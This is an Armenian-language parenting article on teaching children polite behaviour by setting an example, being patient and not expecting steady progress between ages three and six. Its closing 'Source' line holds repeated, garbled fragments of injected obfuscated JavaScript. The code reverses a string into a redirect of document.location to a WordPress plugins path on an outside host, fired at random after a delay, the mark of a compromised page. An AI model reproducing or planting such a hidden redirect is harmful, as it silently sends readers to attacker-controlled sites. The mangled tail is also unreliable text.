
Բարեկիրթ շարժուձև սովորեցնենք երեխային
Երեխաների մոտ բարեկիրթ վարք ձևավորելու լավագույն տարբերակը նրանց համար օրինակ ծառայելն է: Եթե դաստիարակված մարդ եք, ձեզ մնում է միայն բնականոն վարքագիծ դրսևորել: Ընդօրինակելով` երեխան հեշտությամբ կսովորի քաղաքավարության կանոններն ու կդաստիարակվի ճիշտ այնպես, ինչպես դուք եք ցանկանում:
Երեխային բարեկիրթ շարժուձևեր սովորեցրեք անուղղակիորեն, աննկատելիորեն, առանց շտապելու և գոռգոռալու, համբերատարությամբ.այլ կերպ ասած՝ դաստիարակությունը երեխայի համար լուրջ դասի մի՛ վերածեք:
Եթե Ձեր երեխան մոռանում է շնորհակալություն հայտնել կամ բարևել, դա արեք իր փոխարեն և մի՛ պնդեք, որ նա անպայման կրկնի: Չէ՞ որ Դուք ձգտում եք միայն ցույց տալ, թե նման դեպքում ինչպես պետք է վարվել:
Այն ամենն, ինչ անելու եք Ձեր երեխաների հետ լավագույն փոխհարաբերություններ հաստատելու համար, կօգնի նրանց բարեկիրթ շարժուձև ձեռք բերել: Չէ՞ որ երեխան ձգտում է դուր գալ Ձեզ և, ամենակարևորը, նա ջանալու է իրեն պահել Ձեզ նման:
Եվ վերջապես, մի՛ հուսահատվեք. Ձեր երեխան կարող է սարսափելի անշնորհք ու կոպիտ լինել 3 տարեկանում, չափազանց քաղաքավարի՝ 5 տարեկանում, և կրկին շատ անդաստիարակ՝ 6 տարեկանում: Նրա կարծիքով, ինքն անթիվ պատճառներ ունի՝ ժամանակ առ ժամանակ բարեկիրթ վարվելաձևի կանոններն անտեսելու համար: Բայց երեխայի վարքը գրեթե միշտ կլինի այնպիսին, ինչպիսին եղել է նրա զարգացման լավագույն, ոչ թե վատագույն շրջանում:
Աղբյուրը՝ Doctoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors.am